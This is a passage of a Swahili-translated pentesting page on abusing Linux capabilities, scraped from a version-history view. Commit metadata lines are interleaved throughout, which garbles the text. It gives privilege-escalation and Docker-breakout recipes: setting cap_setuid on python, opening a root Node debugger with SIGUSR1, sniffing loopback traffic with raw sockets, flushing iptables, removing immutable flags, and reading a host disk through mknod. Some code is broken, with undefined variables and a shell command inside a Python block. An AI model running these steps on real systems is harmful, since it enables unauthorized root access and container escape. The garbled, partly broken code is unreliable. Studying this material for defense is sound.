 								libcap = ctypes.cdll.LoadLibrary("libcap.so.2")
 								libcap.cap_from_text.argtypes = [ctypes.c_char_p]
 								libcap.cap_from_text.restype = ctypes.c_void_p
 								libcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p]
 								#Give setuid cap to the binary
 								cap = 'cap_setuid+ep'
 								path = sys.argv[1]
 								print(path)
 								cap_t = libcap.cap_from_text(cap)
 								status = libcap.cap_set_file(path,cap_t)
 								if(status == 0):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								print (cap + " was successfully added to " + path)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```
 								{% endcode %}
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
+								```bash
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								python setcapability.py /usr/bin/python2.7
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
+								```
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								{% hint style="warning" %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tafadhali kumbuka kuwa ikiwa unaweka uwezo mpya kwa faili ya CAP\_SETFCAP, utapoteza uwezo huu.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								{% endhint %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Marafiki wakati unaweka [uwezo wa SETUID](linux-capabilities.md#cap\_setuid) kwenye faili, unaweza kwenda kwenye sehemu yake kuona jinsi ya kuongeza mamlaka.
-												GitBook: [#2944] No subject

											
										
										
											2022-01-11 17:03:54 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na mazingira (Docker breakout)**
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa chaguo-msingi, uwezo wa **CAP\_SETFCAP unapewa kwa mchakato ndani ya kontena kwenye Docker**. Unaweza kuthibitisha hilo kwa kufanya kitu kama:
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
+								```bash
 								cat /proc/`pidof bash`/status | grep Cap
 								CapInh: 00000000a80425fb
 								CapPrm: 00000000a80425fb
 								CapEff: 00000000a80425fb
 								CapBnd: 00000000a80425fb
 								CapAmb: 0000000000000000
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
 								capsh --decode=00000000a80425fb
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
+x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Uwezo huu unaruhusu **kutoa uwezo wowote kwa faili za binary**, hivyo tunaweza kufikiria kuhusu **kutoroka** kutoka kwenye chombo kwa **kutumia uwezo mwingine uliovunjika** uliotajwa kwenye ukurasa huu.\
 								Hata hivyo, ikiwa utajaribu kutoa uwezo wa CAP\_SYS\_ADMIN na CAP\_SYS\_PTRACE kwa faili ya gdb, utagundua kuwa unaweza kutoa uwezo huo, lakini **faili ya binary haitaweza kutekelezwa baada ya hapo**:
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
+								```bash
 								getcap /usr/bin/gdb
 								/usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip
 								setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb
 								/usr/bin/gdb
 								bash: /usr/bin/gdb: Operation not permitted
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[Kutoka kwa nyaraka](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Kuruhusiwa: Hii ni **seti ya kikomo kwa uwezo halisi** ambao mchakato unaweza kutumia. Pia ni seti ya kikomo kwa uwezo ambao unaweza kuongezwa kwenye seti ya kurithiwa na mchakato ambao **haujapata uwezo wa CAP\_SETPCAP** kwenye seti yake ya uwezo halisi._\
 								Inaonekana kama uwezo ulioruhusiwa unapunguza uwezo ambao unaweza kutumika.\
 								Hata hivyo, Docker pia hutoa **CAP\_SETPCAP** kwa chaguo-msingi, kwa hivyo huenda uweze **kuweka uwezo mpya ndani ya uwezo wa kurithiwa**.\
 								Hata hivyo, kwenye nyaraka za uwezo huu: _CAP\_SETPCAP: \[…] **ongeza uwezo wowote kutoka kwenye seti ya mipaka ya mchakato unaopiga simu** kwenye seti yake ya kurithiwa_.\
 								Inaonekana kama tunaweza kuongeza kwenye seti ya kurithiwa uwezo kutoka kwenye seti ya mipaka. Hii inamaanisha kwamba **hatuwezi kuweka uwezo mpya kama CAP\_SYS\_ADMIN au CAP\_SYS\_PTRACE kwenye seti ya kurithiwa ili kuongeza uwezo wa mamlaka**.
-												GitBook: [#2944] No subject

											
										
										
											2022-01-11 17:03:54 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYS\_RAWIO
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) hutoa shughuli kadhaa nyeti ikiwa ni pamoja na upatikanaji wa `/dev/mem`, `/dev/kmem` au `/proc/kcore`, kubadilisha `mmap_min_addr`, upatikanaji wa wito wa mfumo wa `ioperm(2)` na `iopl(2)`, na amri mbalimbali za diski. `FIBMAP ioctl(2)` pia imeamilishwa kupitia uwezo huu, ambao umesababisha matatizo katika [siku za nyuma](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). Kulingana na ukurasa wa mwongozo, hii pia inaruhusu mmiliki kufanya `shughuli mbalimbali za kifaa maalum kwenye vifaa vingine`.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii inaweza kuwa na manufaa kwa **kuongeza mamlaka** na **kuvunja kizuizi cha Docker**.
-												GitBook: [#2944] No subject

											
										
										
											2022-01-11 17:03:54 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_KILL
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kwamba ni rahisi kuua mchakato wowote.**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na faili ya binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tufikirie faili ya binary ya **`python`** ina uwezo huu. Ikiwa ungekuwa **pia unaweza kubadilisha mipangilio ya huduma au soketi** (au faili yoyote ya mipangilio inayohusiana na huduma) unaweza kuweka mlango nyuma, kisha kuua mchakato unaohusiana na huduma hiyo na kusubiri faili ya mipangilio mpya itekelezwe na mlango nyuma wako.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
+								```python
 								#Use this python code to kill arbitrary processes
 								import os
 								import signal
 								pgid = os.getpgid(341)
 								os.killpg(pgid, signal.SIGKILL)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Privesc na kill**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 11:47:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa una uwezo wa kuuwa na kuna **programu ya node inayotumika kama root** (au kama mtumiaji tofauti), labda unaweza **kupeleka** ishara ya **SIGUSR1** na kufanya iifungue **msanidi wa node** ambapo unaweza kuunganisha.
-												GitBook: [#3155] No subject

											
										
										
											2022-04-30 16:16:06 +00:00
+								```bash
 								kill -s SIGUSR1 <nodejs-ps>
 								# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								{% content-ref url="linux-capabilities.md" %}
 								[linux-capabilities.md](linux-capabilities.md)
-												GitBook: [#3155] No subject

											
										
										
											2022-04-30 16:16:06 +00:00
+								{% endcontent-ref %}
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								{% embed url="https://www.rootedcon.com/" %}
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_NET\_BIND\_SERVICE
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 12:40:16 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa ni rahisi kusikiliza kwenye bandari yoyote (hata kwenye bandari zenye mamlaka).** Hauwezi kuongeza mamlaka moja kwa moja na uwezo huu.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 12:40:16 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 12:40:16 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa **`python`** ina uwezo huu, itaweza kusikiliza kwenye bandari yoyote na hata kuunganisha kutoka kwenye bandari nyingine yoyote (baadhi ya huduma zinahitaji uhusiano kutoka kwenye bandari maalum za mamlaka)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 12:40:16 +00:00
+								```python
 								import socket
 								s=socket.socket()
 								s.bind(('0.0.0.0', 80))
 								s.listen(1)
 								conn, addr = s.accept()
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
+								while True:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								output = connection.recv(1024).strip();
 								print(output)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 12:40:16 +00:00
+								```
 								{% endtab %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								{% tab title="Connect" %}Weka uhusiano na mfumo wa malengo kwa kutumia njia zifuatazo:
 								- **SSH**: Tumia amri `ssh` kuingia kwenye mfumo wa malengo kwa kutumia kitambulisho cha SSH.
 								- **RDP**: Tumia amri `xfreerdp` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya RDP.
 								- **VNC**: Tumia amri `vncviewer` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya VNC.
 								- **Telnet**: Tumia amri `telnet` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya Telnet.
 								- **FTP**: Tumia amri `ftp` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya FTP.
 								- **SMB**: Tumia amri `smbclient` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya SMB.
 								- **HTTP**: Tumia kivinjari cha wavuti kufikia mfumo wa malengo kupitia itifaki ya HTTP.
 								- **HTTPS**: Tumia kivinjari cha wavuti kufikia mfumo wa malengo kupitia itifaki ya HTTPS.
 								- **WinRM**: Tumia amri `winrm` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya WinRM.
 								- **SSH Tunnel**: Tumia amri `ssh` kuunda handaki la SSH kuelekeza trafiki ya itifaki nyingine kwenye mfumo wa malengo.
 								Kumbuka kurekebisha amri kulingana na mazingira yako na maelezo ya mfumo wa malengo.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 12:40:16 +00:00
+								```python
 								import socket
 								s=socket.socket()
 								s.bind(('0.0.0.0',500))
 								s.connect(('10.10.10.10',500))
 								```
 								{% endtab %}
 								{% endtabs %}
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_NET\_RAW
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) uwezo unaruhusu michakato kuunda soketi za RAW na PACKET, ikiruhusu kutengeneza na kutuma pakiti za mtandao za aina yoyote. Hii inaweza kusababisha hatari za usalama katika mazingira ya kontena, kama vile kudanganya pakiti, kuingiza trafiki, na kuzunguka udhibiti wa upatikanaji wa mtandao. Watendaji wa uovu wanaweza kutumia hii kuingilia kati na ujumbe wa kontena au kuhatarisha usalama wa mtandao wa mwenyeji, haswa bila ulinzi wa kutosha wa kifaa cha moto. Zaidi ya hayo, **CAP_NET_RAW** ni muhimu kwa kontena zenye mamlaka kuunga mkono shughuli kama vile ping kupitia ombi za ICMP za aina ya RAW.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa ni rahisi kusikiliza trafiki.** Hauwezi kuongeza mamlaka moja kwa moja na uwezo huu.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa binary **`tcpdump`** ina uwezo huu, utaweza kutumia kuikamata habari ya mtandao.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								/usr/sbin/tcpdump = cap_net_raw+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tafadhali kumbuka kuwa ikiwa **mazingira** yanatoa uwezo huu, unaweza pia kutumia **`tcpdump`** kusikiliza trafiki.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary 2**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Mfano ufuatao ni msimbo wa **`python2`** ambao unaweza kuwa na manufaa katika kuvuruga trafiki ya kiolesura cha "**lo**" (**localhost**). Msimbo huu umetoka kwenye maabara "_The Basics: CAP-NET\_BIND + NET\_RAW_" kutoka [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
+								```python
 								import socket
 								import struct
 								flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"]
 								def getFlag(flag_value):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								flag=""
 								for i in xrange(8,-1,-1):
 								if( flag_value & 1 <<i ):
 								flag= flag + flags[8-i] + ","
 								return flag[:-1]
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
 								s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
 								s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30)
 								s.bind(("lo",0x0003))
 								flag=""
 								count=0
 								while True:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								frame=s.recv(4096)
 								ip_header=struct.unpack("!BBHHHBBH4s4s",frame[14:34])
 								proto=ip_header[6]
 								ip_header_size = (ip_header[0] & 0b1111) * 4
 								if(proto==6):
 								protocol="TCP"
 								tcp_header_packed = frame[ 14 + ip_header_size : 34 + ip_header_size]
 								tcp_header = struct.unpack("!HHLLHHHH", tcp_header_packed)
 								dst_port=tcp_header[0]
 								src_port=tcp_header[1]
 								flag=" FLAGS: "+getFlag(tcp_header[4])
 								elif(proto==17):
 								protocol="UDP"
 								udp_header_packed_ports = frame[ 14 + ip_header_size : 18 + ip_header_size]
 								udp_header_ports=struct.unpack("!HH",udp_header_packed_ports)
 								dst_port=udp_header[0]
 								src_port=udp_header[1]
 								if (proto == 17 or proto == 6):
 								print("Packet: " + str(count) + " Protocol: " + protocol + " Destination Port: " + str(dst_port) + " Source Port: " + str(src_port) + flag)
 								count=count+1
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 13:16:54 +00:00
+								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_NET\_ADMIN + CAP\_NET\_RAW
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[Uwezo wa CAP\_NET\_ADMIN](https://man7.org/linux/man-pages/man7/capabilities.7.html) unawapa mmiliki uwezo wa **kubadilisha mipangilio ya mtandao**, ikiwa ni pamoja na mipangilio ya firewall, meza za mwelekeo, ruhusa za soketi, na mipangilio ya kiolesura cha mtandao ndani ya majina ya nafasi ya mtandao yaliyofichuliwa. Pia inawezesha kuwasha **hali ya kusikiliza** kwenye vipengele vya mtandao, kuruhusu uchunguzi wa pakiti kote kwenye majina ya nafasi.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na faili ya binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tuchukulie kuwa faili ya **python binary** ina uwezo huu.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
+								```python
 								#Dump iptables filter table rules
 								import iptc
 								import pprint
 								json=iptc.easy.dump_table('filter',ipv6=False)
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
+								pprint.pprint(json)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:13:45 +00:00
 								#Flush iptables filter table
 								import iptc
 								iptc.easy.flush_table('filter')
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_LINUX\_IMMUTABLE
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa niwezekana kubadilisha sifa za inode.** Hauwezi kuongeza mamlaka moja kwa moja na uwezo huu.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa unagundua kuwa faili ni isiyo badilika na python ina uwezo huu, unaweza **kuondoa sifa ya isiyo badilika na kufanya faili iweze kubadilishwa:**
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
+								```python
 								#Check that the file is imutable
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								lsattr file.sh
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
+								----i---------e--- backup.sh
 								```
 								```python
 								#Pyhton code to allow modifications to the file
 								import fcntl
 								import os
 								import struct
 								FS_APPEND_FL = 0x00000020
 								FS_IOC_SETFLAGS = 0x40086602
 								fd = os.open('/path/to/file.sh', os.O_RDONLY)
 								f = struct.pack('i', FS_APPEND_FL)
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
+								fcntl.ioctl(fd, FS_IOC_SETFLAGS, f)
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
 								f=open("/path/to/file.sh",'a+')
 								f.write('New content for the file\n')
 								```
 								{% hint style="info" %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tafadhali kumbuka kuwa kawaida sifa hii isiyoweza kubadilishwa huwekwa na kuondolewa kwa kutumia:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 16:40:28 +00:00
+								```bash
 								sudo chattr +i file.txt
 								sudo chattr -i file.txt
 								```
 								{% endhint %}
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYS\_CHROOT
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) inawezesha utekelezaji wa wito wa mfumo wa `chroot(2)`, ambao unaweza kuruhusu kutoroka kutoka kwa mazingira ya `chroot(2)` kupitia udhaifu uliojulikana:
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* [Jinsi ya kutoroka kutoka kwa suluhisho tofauti za chroot](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
 								* [chw00t: chombo cha kutoroka kutoka chroot](https://github.com/earthquake/chw00t/)
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYS\_BOOT
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_SYS\_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) sio tu inaruhusu utekelezaji wa wito wa mfumo wa `reboot(2)` kwa ajili ya kuanzisha upya mfumo, ikiwa ni pamoja na amri maalum kama `LINUX_REBOOT_CMD_RESTART2` iliyoundwa kwa jukwaa fulani la vifaa, lakini pia inawezesha matumizi ya `kexec_load(2)` na, kutoka Linux 3.17 kuendelea, `kexec_file_load(2)` kwa ajili ya kupakia mifumo ya kuyumba mpya au iliyosainiwa mtawaliwa.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYSLOG
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) iligawanywa kutoka **CAP_SYS_ADMIN** pana katika Linux 2.6.37, ikiruhusu hasa matumizi ya wito wa `syslog(2)`. Uwezo huu unawezesha kuangalia anwani za kernel kupitia `/proc` na interfaces kama hizo wakati mipangilio ya `kptr_restrict` iko kwenye 1, ambayo inadhibiti ufunuo wa anwani za kernel. Tangu Linux 2.6.39, chaguo-msingi kwa `kptr_restrict` ni 0, maana anwani za kernel zinafunuliwa, ingawa usambazaji wengi huiweka kwenye 1 (ficha anwani isipokuwa kutoka kwa uid 0) au 2 (ficha anwani daima) kwa sababu za usalama.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Zaidi ya hayo, **CAP_SYSLOG** inaruhusu kupata matokeo ya `dmesg` wakati `dmesg_restrict` imewekwa kwenye 1. Licha ya mabadiliko haya, **CAP_SYS_ADMIN** inaendelea kuwa na uwezo wa kufanya operesheni za `syslog` kutokana na mifano ya kihistoria.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
+								## CAP\_MKNOD
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) inapanua utendaji wa wito wa mfumo wa `mknod` zaidi ya kuunda faili za kawaida, FIFO (mabomba yaliyopewa majina), au soketi za uwanja wa UNIX. Hasa inaruhusu kuunda faili maalum, ambazo ni pamoja na:
-												GitBook: [#3752] No subject

											
										
										
											2023-01-18 11:08:57 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								- **S_IFCHR**: Faili maalum ya wahusika, ambayo ni vifaa kama vituo vya mawasiliano.
 								- **S_IFBLK**: Faili maalum ya kuzuia, ambayo ni vifaa kama diski.
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Uwezo huu ni muhimu kwa michakato ambayo inahitaji uwezo wa kuunda faili za kifaa, kurahisisha mwingiliano wa moja kwa moja na vifaa vya vifaa kupitia vifaa vya wahusika au vifaa vya kuzuia.
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii ni uwezo wa msingi wa docker ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19)).
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Uwezo huu unaruhusu kufanya uongezaji wa haki za kibali (kupitia kusoma diski kamili) kwenye mwenyeji, chini ya hali zifuatazo:
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. Kuwa na ufikiaji wa awali kwa mwenyeji (bila haki za kibali).
 . Kuwa na ufikiaji wa awali kwa kontena (yenye haki za kibali (EUID 0), na uwezo wa `CAP_MKNOD`).
 . Mwenyeji na kontena wanapaswa kushiriki nafasi ya mtumiaji sawa.
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hatua za Kuunda na Kupata Kifaa cha Kuzuia kwenye Kontena:**
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Kwenye Mwenyeji kama Mtumiaji wa Kawaida:**
 								- Tambua kitambulisho chako cha sasa cha mtumiaji na `id`, kwa mfano, `uid=1000(standarduser)`.
 								- Tambua kifaa cha lengo, kwa mfano, `/dev/sdb`.
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Ndani ya Kontena kama `root`:**
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
+								```bash
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								# Create a block special file for the host device
 								mknod /dev/sdb b 8 16
 								# Set read and write permissions for the user and group
 								chmod 660 /dev/sdb
 								# Add the corresponding standard user present on the host
 								useradd -u 1000 standarduser
 								# Switch to the newly created user
 								su standarduser
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Rudi kwenye Mwenyeji:**
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
+								```bash
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								# Locate the PID of the container process owned by "standarduser"
 								# This is an illustrative example; actual command might vary
 								ps aux | grep -i container_name | grep -i standarduser
 								# Assuming the found PID is 12345
 								# Access the container's filesystem and the special block device
 								head /proc/12345/root/dev/sdb
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii njia inaruhusu mtumiaji wa kawaida kupata na labda kusoma data kutoka `/dev/sdb` kupitia kontena, kwa kutumia nafasi za mtumiaji zilizoshirikiwa na ruhusa zilizowekwa kwenye kifaa.
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### CAP_SETPCAP
-												GITBOOK-3861: change request with no subject merged in GitBook

											
										
										
											2023-04-05 06:58:34 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
